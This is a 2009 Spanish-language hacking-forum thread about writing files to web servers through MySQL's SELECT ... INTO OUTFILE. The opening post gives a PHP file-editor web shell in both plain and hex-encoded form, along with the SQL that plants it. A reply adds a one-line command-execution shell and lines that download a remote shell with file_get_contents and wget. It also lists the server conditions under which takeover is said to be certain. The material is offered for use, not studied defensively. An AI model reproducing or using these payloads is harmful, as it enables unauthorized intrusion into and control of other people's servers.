elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Un buen uso de INTO OUTFILE
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Un buen uso de INTO OUTFILE  (Leído 6,009 veces)
HardieVon

Desconectado Desconectado

Mensajes: 181


Programming HardCore


Ver Perfil WWW
Un buen uso de INTO OUTFILE
« en: 6 Marzo 2009, 02:17 am »

Hola que tal encontre un servidor con phpmyadmin y entre tantas pruebas de codigo como.
<? system(...
<? eval(....
me decidi en fabricar una  pequeña herramientilla.

utilizando la instruccion OUTFILE...
Código
  1. SELECT 0x64 /* Hexadecimal */ INTO OUTFILE "C:/servidor/editor.php"; /* Path del servidor */
y con el codigo php.
Código
  1. <?php $f=$_GET['f'];$s=$_POST['s'];if($s!=''){if($r=fopen($f,'w+')){fwrite($r,stripslashes($s));echo 'OK<br>';}fclose($r);}$r=fopen($f,'r');$c=fread($r,filesize($f));fclose($r);echo "<form method=POST ><textarea name=s >$c</textarea><br><input type=submit value=guardar ></form>";?>

ahora concluimos con este codigo y podremos editar archivos en el servidor...

Código
  1. SELECT
  2. 0x3C3F7068702024663D245F4745545B2766275D3B24733D245F504F53545B2773275D3B6966282473213D2727297B69662824723D666F70656E2824662C27772B2729297B6677726974652824722C7374726970736C617368657328247329293B6563686F20274F4B3C62723E273B7D66636C6F7365282472293B7D24723D666F70656E2824662C277227293B24633D66726561642824722C66696C6573697A6528246629293B66636C6F7365282472293B6563686F20223C666F726D206D6574686F643D504F5354203E3C7465787461726561206E616D653D73203E24633C2F74657874617265613E3C62723E3C696E70757420747970653D7375626D69742076616C75653D67756172646172203E3C2F666F726D3E223B3F3E
  3. INTO OUTFILE "C:/servidor/editor.php";

el nombre del fichero se pasa por una variable GET llamada "f".
de la forma editor.php?f=index.php

Saludos de perro
En línea

OzX


Desconectado Desconectado

Mensajes: 406

[NuKe] Team


Ver Perfil WWW
Re: Un buen uso de INTO OUTFILE
« Respuesta #1 en: 6 Marzo 2009, 02:48 am »

hi brota¡
Into Outfile. siempre sirve. cuando tienes magic quotes off, privilegios en el usuario , y el document root, y una carpeta con permisos.

Con esas 4 cosas, tienes Ya Seguro el Ingreso a un Servidor.

Y en este Post:
http://foro.undersecurity.net/read.php?15,772

E Posteado varias Formas de Obtener Privilegios  Mediante esta tecnica.

Por ej En el Source a Insertar. Ingresar.
Código:
<? file_put_contents('shell.php',file_get_contents('http://www.ruta.com/shell.txt'));?>
Tambien Se Puede pasar  a Hexa SQL para no tener dramas con las " "

En el Caso que no Tenga file_get_conetents, habilitado se puede hacer lo siguiente

Código:
<? system($_REQUEST['cmd']); ?>

y Luego con Wget
Código:
wget -c --output-document=shell.php www.script.com/shell.txt

Asi Kedaria
Código:
http://www.pagina.com/file/c.php?cmd=wget -c --output-document=shell.php www.script.com/shell.txt


Y Vuala ¡




Saludos¡
En línea

Undersecurity.net
HardieVon

Desconectado Desconectado

Mensajes: 181


Programming HardCore


Ver Perfil WWW
Re: Un buen uso de INTO OUTFILE
« Respuesta #2 en: 6 Marzo 2009, 05:00 am »

Si lo que pasa es que con esa tecnica.. existen archivos que superan el tiempo de ejecucion... por que el file_get, supera en algunos casos...colosales tamaños como la c99 y tambien existen algunos server sin consola...



Saludos de perro
« Última modificación: 6 Marzo 2009, 05:04 am por HansVon » En línea

OzX


Desconectado Desconectado

Mensajes: 406

[NuKe] Team


Ver Perfil WWW
Re: Un buen uso de INTO OUTFILE
« Respuesta #3 en: 8 Marzo 2009, 20:15 pm »

Citar
tambien existen algunos server sin consola
Como?

 :huh:
En línea

Undersecurity.net
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Por qué no me funciona instruccion into outfile ?
Bases de Datos
luison 3 7,286 Último mensaje 24 Diciembre 2010, 17:06 pm
por Shell Root
Se puede hacer un INTO OUTFILE en una iSQL BLIND?
Nivel Web
Shell Root 2 2,642 Último mensaje 18 Marzo 2013, 21:07 pm
por WHK
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines